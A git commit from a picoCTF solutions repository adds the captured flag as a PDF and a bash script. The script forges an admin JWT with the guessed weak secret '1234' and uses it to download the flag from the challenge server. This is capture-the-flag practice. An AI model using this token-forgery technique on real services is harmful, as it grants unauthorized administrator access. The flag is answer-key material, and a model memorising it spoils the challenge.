web/java_code_analysis
This commit is contained in:
@@ -0,0 +1,74 @@
|
||||
%PDF-1.1
|
||||
1 0 obj
|
||||
<<
|
||||
/CreationDate (D:20230804211609)
|
||||
/Producer (text2pdf v1.1 (\251 Phil Smith, 1996))
|
||||
/Title (flag.txt)
|
||||
>>
|
||||
endobj
|
||||
2 0 obj
|
||||
<<
|
||||
/Type /Catalog
|
||||
/Pages 3 0 R
|
||||
>>
|
||||
endobj
|
||||
4 0 obj
|
||||
<<
|
||||
/Type /Font
|
||||
/Subtype /Type1
|
||||
/Name /F1
|
||||
/BaseFont /Courier
|
||||
>>
|
||||
endobj
|
||||
5 0 obj
|
||||
<<
|
||||
/Font << /F1 4 0 R >>
|
||||
/ProcSet [ /PDF /Text ]
|
||||
>>
|
||||
endobj
|
||||
6 0 obj
|
||||
<<
|
||||
/Type /Page
|
||||
/Parent 3 0 R
|
||||
/Resources 5 0 R
|
||||
/Contents 7 0 R
|
||||
>>
|
||||
endobj
|
||||
7 0 obj
|
||||
<<
|
||||
/Length 8 0 R
|
||||
>>
|
||||
stream
|
||||
BT
|
||||
/F1 20 Tf
|
||||
1 0 0 1 50 752 Tm
|
||||
12 TL
|
||||
(Great job! Here's your flag:)'
|
||||
()'
|
||||
()'
|
||||
(picoCTF{w34k_jwt_n0t_g00d_7745dc02})'
|
||||
ET
|
||||
endstream
|
||||
endobj
|
||||
8 0 obj
|
||||
119
|
||||
endobj
|
||||
3 0 obj
|
||||
<<
|
||||
/Type /Pages
|
||||
/Count 1
|
||||
/MediaBox [ 0 0 612 792 ]
|
||||
/Kids [ 6 0 R ]
|
||||
>>
|
||||
endobj
|
||||
xref
|
||||
0 9
|
||||
0000000000 65535 f
|
||||
0000000009 00000 n
|
||||
0000000131 00000 n
|
||||
0000000599 00000 n
|
||||
0000000180 00000 n
|
||||
0000000258 00000 n
|
||||
0000000329 00000 n
|
||||
0000000409 00000 n
|
||||
0000000580 00000 n
|
||||
Executable
+22
@@ -0,0 +1,22 @@
|
||||
#!/usr/bin/env nix-shell
|
||||
#!nix-shell -i bash -p jwt-cli
|
||||
|
||||
URL="http://saturn.picoctf.net:54161"
|
||||
|
||||
# NOTE: see:
|
||||
# - ./bookshelf-pico/src/main/java/io/github/nandandesai/pico/security/SecretGenerator.java
|
||||
# - ./bookshelf-pico/src/main/java/io/github/nandandesai/pico/security/ReauthenticationFilter.java
|
||||
# - ./bookshelf-pico/src/main/java/io/github/nandandesai/pico/controllers/BookController.java
|
||||
# - ./bookshelf-pico/src/main/java/io/github/nandandesai/pico/services/BookService.java
|
||||
|
||||
TOKEN="$(jwt encode \
|
||||
--secret=1234 \
|
||||
--iss=bookshelf \
|
||||
--exp="1w" \
|
||||
'{"userId": 2, "email": "user", "role": "Admin"}'
|
||||
)"
|
||||
|
||||
curl "$URL/base/books/pdf/5" \
|
||||
-H "Authorization: Bearer $TOKEN" \
|
||||
--output flag.pdf
|
||||
|
||||
Reference in New Issue
Block a user